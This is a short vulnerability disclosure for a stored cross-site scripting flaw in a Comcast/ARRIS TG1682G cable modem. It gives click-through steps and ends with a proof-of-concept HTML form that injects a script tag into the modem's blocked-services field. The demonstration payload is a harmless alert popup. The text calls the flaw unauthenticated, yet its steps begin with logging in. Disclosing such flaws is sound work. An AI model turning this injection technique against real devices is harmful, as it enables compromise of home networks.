Comcast Cable Modem (Unathenticated Stored XSS)

Credit Nu11By73


Comcast home cable modem version TG1682G was identified by researchers to hold stored cross site scripting. This exploit is accessible without authentication by an attacker on the local network.

Device Description:
1 port residential gateway
Hardware Version:
Original Software Version:
Software Image:
Advanced Services:

Exploitation Writeup

The Comcast ARRIS home cable modem was tested against many different vulnerabilities. This testing led to the identifcation of a stored cross site scripting vulnerbaility that could be exploited without authentication. Below is the proof of concept code that was used to issue an http post to the backend software.


Managed Devices
1. Login to the modem
2. Click parental control
3. Click managed devices
4. Click add blocked device
5. In the custom device boxes type what is shown in the first image and click save
6. When the page refreshes you will see the popup

Managed Services
1. Click on the managed services button
2. Click on the add button next to blocked services
3. Enter the information shown in the first screen shot below and click save
4. Once the site is done rendering you will receive the pop up

Connected Devices
1. Click connected devices
2. Click add device with reserved ip
3. Add the information shown in the first screenshot below
4. Click save and wait for the page to refresh to receive the pop ups

Proof of concept code:
The code below was used to exploit the application.

Managed Services POC
<p>Unauth Stored XSS - Xfinity Modem</p>
<form method="POST" action="">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />